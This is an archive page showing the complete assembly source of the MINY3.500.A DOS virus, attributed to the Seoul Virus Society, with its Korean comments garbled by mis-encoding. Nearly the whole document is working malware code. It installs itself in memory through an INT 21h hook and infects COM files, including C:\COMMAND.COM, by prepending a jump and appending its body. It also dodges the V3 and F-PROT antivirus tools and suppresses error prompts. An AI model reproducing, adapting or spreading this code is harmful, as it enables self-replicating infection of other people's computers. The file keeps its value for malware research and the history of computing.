Collection of Hack-Phreak Scene Programs

home *** CD-ROM | disk | FTP | other *** search

/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / KOREACOL.ZIP / MINY.ZIP / MINY3.ZIP / MY3-500.ASM < prev next >

Wrap

Assembly Source File | 1996-08-12 | 10KB | 331 lines

;****************************************************************************** ; ; MINY3.500.A Virus ; ; ╣A╕b: ¼ß╢ë ña╖í£ß»a ╡e╨s ╣A╕b: 1995æe 02╢⌐ 22╖⌐ - ╢⌐ ╖⌐ ; Seoul Virus Society ; ;****************************************************************************** VIRUS SEGMENT PARA 'VIRUS' ASSUME CS:VIRUS, DS:VIRUS Entry: mov BP,100h ; BP=ña╖í£ß»a »í╕b ║ü¡íêt NOP NOP JMP ChkVirinMEM ; £æ ¼w║ü ╠a╦a¥í ╕±╧a NOP NewInt21: ; ¼ü¥í╢à 21h ñσ ╖Ñ╚ß£≤╦a PushF NOP cmp ah,4Bh ; »⌐╨ù╖Ñêa? NOP jz C_InfectFile ; ╠a╖⌐ êq╡q ╤í┬ë ChkAH: cmp ah,3Dh ; ╡í╧e ╖Ñêa? jz C_InfectFile cmp ah,43h ; ¡ó¼≈ jz C_InfectFile cmp ah,56h ; ╠a╖⌐ ╖íƒq ñaÄüïí jz C_InfectFile cmp ah,6Ch ; 5.0 ╡A¼ß ªü╚ß ┬üêaûE ╡í╧e jz C_InfectFile ChkAHF0: cmp AX,0F035h ; £æ ¼w║ü ╡aªü ê±¼a╖Ñêa? jnz ChkAHF1 PopF xor ax,ax ; áx╖aíe 0000╖i ò⌐¥a║æ IRET ChkAHf1: cmp AX,0F135h ; C:\COMMAND.COM ╗í╕≈êq╡q jnz OrgInt21 mov dx, offset FstFile ; C:\COMMAND.COM Push CS Pop DS call InfectFile ; ╠a╖⌐ êq╡q popf IRET C_InfectFile: NOP call InfectFile OrgInt21: ; ╢Ñ£ü int 21¥í ╕±╧a NOP PopF db 0EAh OldInt21 dd ? C_OldInt21: NOP xchg ah,al PushF call dword ptr CS:[OldInt21] RET ;------------------------------------------------------------------ ; InfectFile: Push AX ; ¥A╗í»a╚ß ╕ß╕w Push BX Push CX Push DX Push DS Push ES Push SI Push DI NOP cmp ah,6ch ; ¼ü¥í╢à ╡í╧e ñw»ó╖Ñêa? NOP jz Chk_EXTisCOM mov si,dx ; SI= ╠a╖⌐ »í╕b╢ß├í Chk_EXTisCOM: lodsb ; DS:[SI] -> AL cmp al,00 ; ╠a╖⌐ Å{╖Ñêa? jz JumpExit cmp al,'.' ; ╤┬╕w╕a èüÑi? jnz Chk_EXTisCOM lodsw cmp ax,'OC' jnz JumpExit lodsb cmp al,'M' jz SetInt24h JumpExit: Jmp PopRES ; COM ╖í ┤aôííe ╣A╢A SetInt24h: mov bx,ds ; Int 24h ƒi └a╗í╨eöa. xor ax,ax mov ds,ax Push DS:[0090h] Push DS:[0092h] mov word ptr DS:[0090h],offset NewInt24 mov word ptr DS:[0092h],cs mov ds,bx mov ax,0043h ; ¡ó¼≈ ┤Φïí call C_OldInt21 Push CX Push DX Push DS MOV AX,0143h ; ╖¬ïí/│aïí ¡ó¼≈╖a¥í ñaÄæ xor cx,cx call C_OldInt21 jnc Open_File JMP SetOrgAttr Open_File: mov ax,023dh ; ╠a╖⌐ ╡í╧e ╨aïí call C_OldInt21 jc SetOrgAttr push cs pop ds Push cs pop es xchg bx,ax ; ╨àùi ┤Φïí Read_File: mov ah,3Fh ; ╖¬┤ß ùi╖íïí mov dx,offset Org4bytes mov si,dx mov cx,0004h int 21h ChkEXEFile: mov AX,word ptr DS:[SI] ; EXE ╠a╖⌐╖Ñ╗í ê±¼a cmp AX,'ZM' ; 'MZ' jz Close_File ChkFSize: cmp byte ptr DS:[SI+3],35h ; êq╡q ╡aªü ╤┬╖Ñ jz Close_File mov di,offset V3_Str ; V3 ╖Ñ╗í ê±¼a mov cx,0004 repz cmpsb jz Close_file mov al,02h ; ╠a╖⌐╖ü ╣A╖⌐ ûß¥í call AH42h cmp ax,1234 ; 1234 Ñíöa ╕b╖eêa? jb Close_File cmp ax,64000 ; 64000 Ñíöa ╟eêa? ja Close_File Push AX add AX,0100h mov word ptr DS:[Entry+1],ax ; ña╖í£ß»a »í╕b╢ß├í Pop AX sub ax,0003 ; JMP íw¥w ╣í╕b mov word ptr ds:[FileHead+1],ax mov byte ptr ds:[FileHead+3],35h mov ax,5700h ; Éi╝a/»íêe ┤Φïí Int 21h Push CX Push DX mov al,40h ; ña╖í£ß»a │aïí xor dx,dx mov cx, offset End_Virus call C_OldInt21 mov al,00h ; ╠a╖⌐╖ü └ß╖q╖a¥í ╖íò╖ call AH42h mov al,40h ; ña╖í£ß»a │aïí mov dx, offset FileHead mov cx,0004h call C_OldInt21 Pop dx ; ╢Ñ£ü Éi╝a¥í ñaÄüïí Pop CX mov ax,5701h Int 21h Close_File: ; ╠a╖⌐ öhïí mov ah,3eh Int 21h SetOrgAttr: Pop DS ; ╢Ñ£ü ¡ó¼≈╖a¥í ñaÄüïí Pop DX pop CX mov ax,0143h Call C_OldInt21 xor ax,ax ; Int 24h Ñóèü mov ds,ax POP DS:[0092h] POP DS:[0090h] PopRES: Pop DI ; ╢Ñ£ü ¥A╗í»a╚ß Ñóèü Pop si Pop ES Pop ds Pop dx Pop cx Pop bx Pop ax RET ;------------------------------------------------------------------- ; £æ ¼w║ü ªüªà ; òí»a╖ü ┬A¼w╢ß╡A ¼w║ü╨eöa. ChkVirinMEM: xor si,si ; F-PROT ╖ü ╗Ñöe ïíôw╖i A_F: nop ; óü¥b╤┴»í╟Ñöa. inc si cmp si,1234h jnz A_F mov ax,35F0h ; AX=F035h/Int 21h»í xchg ah,al ; Int 21h ; or ax,ax ; jz Already_MEM ; £æ╡A ╣Ñ╕ü╨aôeêa? xor bx,bx ; BX=0000 mov ds,bx ; 0000:0084h Ñó¼a mov si,0083h NOP lea DI,SS:[BP+OldInt21] Inc SI NOP cld movsw ; 0000:0084 -> Push cs Pop AX movsw ; 0000:0086 -> Push cs Pop ds mov CX,(offset Tend_virus - SEGORG +15 ) SHR 4 ;└a╗í╨i £æ ╟aïí dec ax mov ds,ax ; MCB (Memory Control Block) Inc BL ; BX=0001 NOP cmp byte ptr DS:[BX-1],'Z' ; áa╗íáb ºi£Γ╖Ñêa? jnz Already_MEM NOP sub word ptr DS:[BX+02],CX ; áa╗íáb ¡Aïaáσ╦a ëü¼e NOP sub word ptr DS:[BX+11h],CX ; òí»aêa ¼a╢w╨i ╢w£╖ ║ë╖▒ NOP mov ES,word ptr DS:[BX+11h] ; NOP Push cs ; CS=DS Pop ds mov si,BP ; ña╖í£ß»a Ñó¼a NOP xor di,di ; IP=0000 ªü╚ß ╣Ñ╕ü╨eöa. mov cx, offset TEnd_Virus ; ña╖í£ß»a ï⌐╖í repz movsb ; Ñó¼a mov ds,cx ; CX=0000 cli ; mov word ptr ds:[BX+85h],es ; BX=0001 mov word ptr ds:[BX+83h],offset NewInt21 sti mov ah,30h ; òí»a ñß╕σ┤Φïí Int 21h cmp al,05 ja Already_Mem ; òí»a 6.0 ╖í¼w╖ííe ╣A╢A Mov ax,35F1h ; C:\COMMAND.COM êq╡q»í╟íïí xchg ah,al Int 21h Already_Mem: mov si,BP ; SI ôe ña╖í£ß»a »í╕b╢ß├í push cs ; cs=ds pop ds push cs ; ds=es pop es Re_COM: ; COM ╠a╖⌐ »⌐╨ù╨aïí add si,offset Org4bytes ; ╢Ñ£ü òA╖í╚ß╖ü êt èü╨aïí mov di,00FFh Inc di ; └ß╖q╖ü 4 ña╖í╦a Ñóèü push di movsw movsw xor ax,ax RET ; »a╚é╡A 100h êa ╕ß╕w Org4bytes db 90h,90h,0cdh,20h ; ╢Ñ£ü 4 ña╖í╦a╖ü êt Ah42h: xor dx,dx xor cx,cx mov ah,42h Int 21h RET NewInt24: ; ╡A£ßêa Éa╗í ┤gëA╨eöa. XOR AL,AL IRET db '[Miny3]' ; ña╖í£ß»a ╖íƒq FstFile db 'C:\command.COM',00 ; C:\COMMAND.COM V3_Str db 0EBh,13h,73h,43h ; V3 ╠a╖⌐ ╕a₧a FileHead db 0E9h End_VIRUS: db ?,?,? TEnd_VIRUS: Virus EndS End Entry